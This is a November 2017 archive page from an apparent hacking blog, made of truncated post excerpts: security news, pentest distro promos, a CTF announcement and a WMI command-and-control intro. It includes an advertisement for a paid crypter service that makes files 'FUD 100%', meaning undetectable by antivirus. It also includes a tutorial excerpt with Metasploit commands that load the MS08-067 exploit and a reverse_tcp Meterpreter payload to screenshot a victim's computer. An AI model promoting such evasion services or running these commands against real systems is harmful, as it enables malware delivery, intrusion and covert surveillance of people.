Month: November 2017


Fud 100% services packages ready for sales

We offer a monthly Crypter service to make your files undetectable encrypted! this is how it works: You zip the files you want to encrypt and send them to our email then we will encrypt and make your files/file fud 100% (undetectable by any antivirus) and send them back to your email! We offer 3 packages: Standard Prenium Ultimate All those packages offer some unique futures to encrypt your file!  


Black Window 10 v2

  Black Window Enterprise 10 Codename : Polemos Black Window 10 Enterprise is the first windows based penetration testing distribution with Linux integrated ! The system comes activated with a digital license for Windows enterprise! It supports windows apps and Linux apps, GUI and terminal apps! It comes with a tone off hacking tools plus all the tools that are included with the latest release of Cerberus Linux! It has managed to implement Cerberus os within windows. Offers the stability of a windows system…


Announcing the Metasploitable3 Community CTF

Been waiting for the Linux version of Metasploitable3 to drop? We’ll do you one better: Metasploit is giving the community a week to rain shells on a penguin-shaped Metasploitable3 instance—and to win prizes at the end of it. Play starts December 4; see below for full competition details. TL;DR: Sign up, drop shells, win stuff. Not into capturing flags but jonesing for a look at the code? We’ll release the Linux Metasploitable3 source code to the community soon after the competition ends. Happy hacking!…


How to install kali linux within windows 10!

Things you need: First, you need to have Windows 10 system then according to Microsoft's instructions to enable   and install WSL and Python 3.0. Python 3.5 WSL-Distribution-Switcher Git Step 1 Once you’re sure you’re using the correct version of Windows 10 Anniversary Update, open the Settings app and head to Update & Security > For Developers. Activate the “Developer Mode” switch here to enable Developer Mode. Next, open the Control Panel, click “Programs,” and click “Turn Windows Features On or Off” under Programs and Features. Enable the…


SAML Post-Intrusion Attack Mirrors ‘Golden Ticket’

Researchers at CyberArk Labs have created a post-intrusion attack technique known as a Golden SAML that could allow an attacker to fake enterprise user identities and forge authentication to gain access to valuable cloud resources in a federation environment. “Using this post-exploit technique, attackers can become any user they want to be – with the highest level of privileges – and gain approved, federated access to a targeted app,” according to CyberArk Labs who revealed the attack technique this week. Related PostsUber Reveals 2016…

New Releases

Cerberus Futuristic Desktop (Kerberos Update)

Cerberus Teaser Cerberus Gnu Debian Linux Cerberus is a penetration testing distribution focusing on automation and anonymity , it aims to have the best tools available on the hacking scene tools like : Fuzzbunch,Dandespritz, Cobalt strike , Armitage , Metasploit framework and metasploit cummunity version set up and ready for use!!It includes custom scripts ,custom themes,custom icons !Cerberus distribution is based on debian testing ,it has the capability to use 3 repositories to install packages from kali repo,debian repo and cybersec repo! Cerberus is…


Uber Reveals 2016 Breach of 57 Million User Accounts

Ride-hailing service Uber Technologies revealed Tuesday that the company suffered a breach of 57 million Uber user accounts in 2016. According to reports, Uber then attempted to cover up the incident by paying $100,000 to attackers to keep the hack a secret and delete the data. The breach and subsequent failure to properly disclose the incident also cost Uber’s chief security officer Joe Sullivan and one of his deputies their jobs. Related PostsCENTCOM Says Massive Data Cache Found on Leaky Server is Benign November…


How to Remotely Grab a Screenshot of Someone’s Compromised Computer

Set Up the Hack First , let's select an exploit to use. Since he's using a Windows Server 2003 system, I like to use the MS08_067_ netapi exploit, so let's type: msf > use exploit/windows/smb/ms08_067_netapi To simplify our screen captures, we'll need to use Metasploit's Meterpreter payload. Let's load it into our exploit by: msf > (ms08_067_netapi) set payload windows/meterpreter/reverse_tcp Next, we need to set our options. At this point, I like to use the "show options" command to see what options are necessary to run…


US-CERT Warns of ASLR Implementation Flaw In Windows

The U.S. Computer Emergency Readiness Team is warning of a vulnerability in Microsoft’s implementation of Address Space Layout Randomization that affects Windows 8, Windows 8.1 and Windows 10. The vulnerability could allow a remote attacker to take control of an affected system. Microsoft said it is investigating the matter. Related PostsMicrosoft Patches 20 Critical Vulnerabilities November 14, 2017 , 5:10 pmGoogle Patches KRACK Vulnerability in Android November 8, 2017 , 10:10 amTor Browser Users Urged to Patch Critical ‘TorMoil’ Vulnerability November 4, 2017 ,…


Command and Control – WMI

Command and Control – WMI November 20, 2017 netbiosXRed TeamC2, Command and Control, Penetration Testing, Red Team, WMI1 Comment Windows Management Instrumentation (WMI) is a Microsoft technology that was designed to allow administrators to perform local and remote management operations across a network. Since WMI is part of the windows ecosystem which exist since Windows 98 it can be used in almost every network regardless if it is running Windows 10 or Windows XP. Some of the operations that can be performed via WMI…